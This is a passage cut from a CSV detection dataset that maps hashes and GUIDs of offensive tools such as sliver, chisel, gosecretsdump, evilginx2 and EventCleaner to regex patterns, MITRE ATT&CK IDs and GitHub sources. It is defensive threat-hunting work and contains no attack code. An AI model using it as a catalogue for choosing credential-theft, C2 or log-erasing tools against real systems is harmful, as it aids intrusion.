- T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*08DBC2BF-E9F3-4AE4-B0CC-6E9C8767982D*",".{0,1000}08DBC2BF\-E9F3\-4AE4\-B0CC\-6E9C8767982D.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*08e4c0ff7e4631b54fc848a95a15be134089e2422cc173f96ae11ee3e803d95d*",".{0,1000}08e4c0ff7e4631b54fc848a95a15be134089e2422cc173f96ae11ee3e803d95d.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*09323E4D-BE0F-452A-9CA8-B07D2CFA9804*",".{0,1000}09323E4D\-BE0F\-452A\-9CA8\-B07D2CFA9804.{0,1000}","offensive_tool_keyword","COM-Hunter","COM-hunter is a COM Hijacking persistnce tool written in C#","T1122 - T1055.012","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/nickvourd/COM-Hunter","1","0","N/A","10","3","241","46","2024-03-10T11:00:11Z","2022-05-26T19:34:59Z" "*09387bf7e4ca97704227fb00618e4056be0852acd1885841da239162457542d4*",".{0,1000}09387bf7e4ca97704227fb00618e4056be0852acd1885841da239162457542d4.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*09480a5f53d380fcec0fd43f60435c4d6ad9d3decca9cfa419614353f1557a48*",".{0,1000}09480a5f53d380fcec0fd43f60435c4d6ad9d3decca9cfa419614353f1557a48.{0,1000}","offensive_tool_keyword","Heroinn","A cross platform C2/post-exploitation framework implementation by Rust.","T1059 - T1547 - T1068 - T1562 - T1110 - T1083 - T1021 - T1071","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/b23r0/Heroinn","1","0","N/A","10","10","617","209","2022-10-08T07:27:38Z","2015-05-16T14:54:19Z" "*0968703e426943707b405b5c5bb0ca14ce2e21c8f125954d8ab26c808f45dc47*",".{0,1000}0968703e426943707b405b5c5bb0ca14ce2e21c8f125954d8ab26c808f45dc47.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*0971A047-A45A-43F4-B7D8-16AC1114B524*",".{0,1000}0971A047\-A45A\-43F4\-B7D8\-16AC1114B524.{0,1000}","offensive_tool_keyword","BackupOperatorToDA","From an account member of the group Backup Operators to Domain Admin without RDP or WinRM on the Domain Controller","T1078 - T1078.003 - T1021 - T1021.006 - T1112 - T1003.003","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/mpgn/BackupOperatorToDA","1","0","N/A","10","4","367","54","2022-10-05T07:29:46Z","2022-02-15T20:51:46Z" "*09764c124174dfc424e00b57c8464025dc6bbfcae62e709bf505a7eece480173*",".{0,1000}09764c124174dfc424e00b57c8464025dc6bbfcae62e709bf505a7eece480173.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*09855e8685bbec09962affefbfad2c554d434a87aca1e1ac8c961f5ebfe6cdad*",".{0,1000}09855e8685bbec09962affefbfad2c554d434a87aca1e1ac8c961f5ebfe6cdad.{0,1000}","offensive_tool_keyword","ASPJinjaObfuscator","Heavily obfuscated ASP web shell generation tool.","T1100 - T1027","TA0003 - TA0005?","N/A","N/A","Defense Evasion","https://github.com/fin3ss3g0d/ASPJinjaObfuscator","1","0","N/A","8","1","60","11","2024-04-26T01:27:42Z","2024-04-23T01:01:53Z" "*09877a6147033fd5a670e8828058d51d71926e684e53582bff7d5c27b6f9501e*",".{0,1000}09877a6147033fd5a670e8828058d51d71926e684e53582bff7d5c27b6f9501e.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*099b726fb0a1160c72e7f8ea20313721f9a060b48eb95bb9c5b7aaee948439c2*",".{0,1000}099b726fb0a1160c72e7f8ea20313721f9a060b48eb95bb9c5b7aaee948439c2.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*09b3f22e8ad0fe1b6c07c202f07816fe3d4014835f3311620ca3b0bd5f710fe7*",".{0,1000}09b3f22e8ad0fe1b6c07c202f07816fe3d4014835f3311620ca3b0bd5f710fe7.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*09c297ffdf475a85c46c9332884fc3343d2512318f9be43b21bf45f522d12956*",".{0,1000}09c297ffdf475a85c46c9332884fc3343d2512318f9be43b21bf45f522d12956.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*09d3cc04fe795a9883abe23bee0ba2b011a4ed759e09dffd811f157233688be4*",".{0,1000}09d3cc04fe795a9883abe23bee0ba2b011a4ed759e09dffd811f157233688be4.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*09e9ba137516adc361f33e2131db31841edb2f83c133a4e2790878997344e4ba*",".{0,1000}09e9ba137516adc361f33e2131db31841edb2f83c133a4e2790878997344e4ba.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*09e9c1c8da3f14a7910538675ac43764e07fc91c15df116519059a1af942d902*",".{0,1000}09e9c1c8da3f14a7910538675ac43764e07fc91c15df116519059a1af942d902.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*0a0f2a82d5f3dbd8d9f8c6031b2ebb8c1820cf370e6b4fae2b1396cf2107dddd*",".{0,1000}0a0f2a82d5f3dbd8d9f8c6031b2ebb8c1820cf370e6b4fae2b1396cf2107dddd.{0,1000}","offensive_tool_keyword","teams_dump","PoC for dumping and decrypting cookies in the latest version of Microsoft Teams","T1560.001 - T1555.003 - T1113 - T1557","TA0006 - TA0005 - TA0009","N/A","N/A","Credential Access","https://github.com/byinarie/teams_dump","1","0","N/A","7","2","121","19","2023-11-12T18:47:55Z","2023-09-18T18:33:32Z" "*0A1C2C46-33F7-4D4C-B8C6-1FC9B116A6DF*",".{0,1000}0A1C2C46\-33F7\-4D4C\-B8C6\-1FC9B116A6DF.{0,1000}","offensive_tool_keyword","DllNotificationInjection","A POC of a new threadless process injection technique that works by utilizing the concept of DLL Notification Callbacks in local and remote processes.","T1055.011 - T1055.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/ShorSec/DllNotificationInjection","1","0","N/A","10","1","17","3","2023-08-23T13:50:27Z","2023-12-01T12:47:43Z" "*0a235cd4c61c042f550e1b348ed8f8ca3bd8254bb72213ecf7ec172eec7edba5*",".{0,1000}0a235cd4c61c042f550e1b348ed8f8ca3bd8254bb72213ecf7ec172eec7edba5.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*0A2B3F8A-EDC2-48B5-A5FC-DE2AC57C8990*",".{0,1000}0A2B3F8A\-EDC2\-48B5\-A5FC\-DE2AC57C8990.{0,1000}","offensive_tool_keyword","EventCleaner","erase specified records from Windows event logs","T1070.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/QAX-A-Team/EventCleaner","1","0","N/A","10","6","577","148","2018-09-07T11:02:01Z","2018-07-27T07:37:32Z" "*0a3659cf00c99f85805b64bdbde13f3f3993163c0eaa5a6345e301c4331fb581*",".{0,1000}0a3659cf00c99f85805b64bdbde13f3f3993163c0eaa5a6345e301c4331fb581.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*0a99e30e751c3a01ffe34efaa615c55a6cbbc42038f7004ac356dad5dbba1ada*",".{0,1000}0a99e30e751c3a01ffe34efaa615c55a6cbbc42038f7004ac356dad5dbba1ada.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*0aa6a04c0e8bb0022ccbe0c6f2bf6bc1806c59ffffae3981ae083e49e78573b7*",".{0,1000}0aa6a04c0e8bb0022ccbe0c6f2bf6bc1806c59ffffae3981ae083e49e78573b7.{0,1000}","offensive_tool_keyword","AMSITrigger","AMSITrigger will identify all of the malicious strings in a powershell file by repeatedly making calls to AMSI using AMSIScanBuffer - line by line. On receiving an AMSI_RESULT_DETECTED response code the line will then be scrutinised to identify the individual triggers","T1059.001 - T1218.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RythmStick/AMSITrigger","1","0","https://www.rythmstick.net/posts/amsitrigger/","10","10","N/A","N/A","N/A","N/A" "*0aaf0c9b2f4f67ea3012cef59464ce4899556e29920bdbec219f469e1b8fe935*",".{0,1000}0aaf0c9b2f4f67ea3012cef59464ce4899556e29920bdbec219f469e1b8fe935.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*0ac4490e04a65d571cc7b069b5070a4853516300b8ea43bd304ca484bf68c761*",".{0,1000}0ac4490e04a65d571cc7b069b5070a4853516300b8ea43bd304ca484bf68c761.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*0ac82760-3e0d-4124-bd1c-92c8dab97171*",".{0,1000}0ac82760\-3e0d\-4124\-bd1c\-92c8dab97171.{0,1000}","offensive_tool_keyword","PowerSCCM","PowerSCCM - PowerShell module to interact with SCCM deployments","T1059.001 - T1018 - T1072 - T1047","TA0005 - TA0003 - TA0002","N/A","N/A","Exploitation tools","https://github.com/PowerShellMafia/PowerSCCM","1","0","N/A","8","4","327","109","2022-01-22T15:30:56Z","2016-01-28T00:20:22Z" "*0acac34993ed96c9c8ba60fd6914937c626330b2e490885fd0b9837e171a3c44*",".{0,1000}0acac34993ed96c9c8ba60fd6914937c626330b2e490885fd0b9837e171a3c44.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*0ADFD1F0-7C15-4A22-87B4-F67E046ECD96*",".{0,1000}0ADFD1F0\-7C15\-4A22\-87B4\-F67E046ECD96.{0,1000}","offensive_tool_keyword","TokenPlayer","Manipulating and Abusing Windows Access Tokens","T1134 - T1484 - T1055 - T1078","TA0004 - TA0005 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S1ckB0y1337/TokenPlayer","1","0","N/A","10","3","254","46","2021-01-15T16:07:47Z","2020-08-20T23:05:49Z" "*0ae12dd51a6faf674521da0fbb3cb8aba5425934aee91b6e204386b38505ab49*",".{0,1000}0ae12dd51a6faf674521da0fbb3cb8aba5425934aee91b6e204386b38505ab49.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*0aebcf5b97bf1ae6286c7aa7000f1ee68b063bd9ded6c871c708c8e639793c3f*",".{0,1000}0aebcf5b97bf1ae6286c7aa7000f1ee68b063bd9ded6c871c708c8e639793c3f.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*0af1e638d78ecb998aa44a6716084ce830af74c68c641bc1634a9841de3caa76*",".{0,1000}0af1e638d78ecb998aa44a6716084ce830af74c68c641bc1634a9841de3caa76.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*0b1a6a5a3e7a22a2f68a7b2b83b33117a63f0d6337dddb3d41b250a995210d79*",".{0,1000}0b1a6a5a3e7a22a2f68a7b2b83b33117a63f0d6337dddb3d41b250a995210d79.{0,1000}","offensive_tool_keyword","bypass-clm","PowerShell Constrained Language Mode Bypass","T1059.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/calebstewart/bypass-clm","1","0","N/A","8","3","202","33","2021-01-31T19:13:55Z","2021-01-29T04:46:23Z" "*0b3924b330e85ff7db62e4d7e665397fd04c3b056b135a184aa87fcabbf1fad9*",".{0,1000}0b3924b330e85ff7db62e4d7e665397fd04c3b056b135a184aa87fcabbf1fad9.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","file_hash","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "*0b6c277ada6299603f6af3a2ec7bf7134df0c71d8f45438eeb65a2455d351e27*",".{0,1000}0b6c277ada6299603f6af3a2ec7bf7134df0c71d8f45438eeb65a2455d351e27.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/C-Sto/gosecretsdump","1","0","N/A","10","4","354","48","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z" "*0B6D8B01-861E-4CAF-B1C9-6670884381DB*",".{0,1000}0B6D8B01\-861E\-4CAF\-B1C9\-6670884381DB.{0,1000}","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/openbullet","1","0","N/A","10","10","1426","688","2023-02-24T16:29:01Z","2019-03-26T09:06:32Z" "*0b79812a3202ddcd7f58de6c1912beed92b163a0ad930193b02f134059d8c420*",".{0,1000}0b79812a3202ddcd7f58de6c1912beed92b163a0ad930193b02f134059d8c420.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*0b8e4ffbabf5f6e7167013a324e67e2a359d35043145eb8af7d8815e7e12242b*",".{0,1000}0b8e4ffbabf5f6e7167013a324e67e2a359d35043145eb8af7d8815e7e12242b.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","file_hash","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "*0ba663873a7926866e3dd717b970f7e651700d00e9d99f667dfd473eafa81b8a*",".{0,1000}0ba663873a7926866e3dd717b970f7e651700d00e9d99f667dfd473eafa81b8a.{0,1000}","offensive_tool_keyword","KExecDD","Admin to Kernel code execution using the KSecDD driver","T1068 - T1055.011","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/floesen/KExecDD","1","0","N/A","8","2","172","27","2024-04-19T09:58:14Z","2024-04-19T08:54:49Z" "*0bc38984ce64aa213a77c2c9125a68a057f76f354a44060f8342d5375368ef04*",".{0,1000}0bc38984ce64aa213a77c2c9125a68a057f76f354a44060f8342d5375368ef04.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*0bcce0874f30d8d38fabb4fcc1bb44fc60d811c7ff1ae3d3869601d44d65a80a*",".{0,1000}0bcce0874f30d8d38fabb4fcc1bb44fc60d811c7ff1ae3d3869601d44d65a80a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*0bdf933e7adf4960c337d0badbd044ccf14ab36731360c5c92001c9c5feded21*",".{0,1000}0bdf933e7adf4960c337d0badbd044ccf14ab36731360c5c92001c9c5feded21.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*0byt3m1n1-V2*",".{0,1000}0byt3m1n1\-V2.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","php title webshell","7","10","1967","343","2024-05-01T05:24:28Z","2020-05-13T11:28:52Z" "*0c19f220188feff67261fd9ac6448ee06b84b8e836f1e558592c2b381e671194*",".{0,1000}0c19f220188feff67261fd9ac6448ee06b84b8e836f1e558592c2b381e671194.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*0c28929dbbc6cfe733ed93670025f18f03642a4b323d7fd123ae63c9366afc31*",".{0,1000}0c28929dbbc6cfe733ed93670025f18f03642a4b323d7fd123ae63c9366afc31.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/C-Sto/gosecretsdump","1","0","N/A","10","4","354","48","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z" "*0c2b8e134f235970726f41712824ce62f42635e4bd647dfcdb58c8fff88cff36*",".{0,1000}0c2b8e134f235970726f41712824ce62f42635e4bd647dfcdb58c8fff88cff36.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation 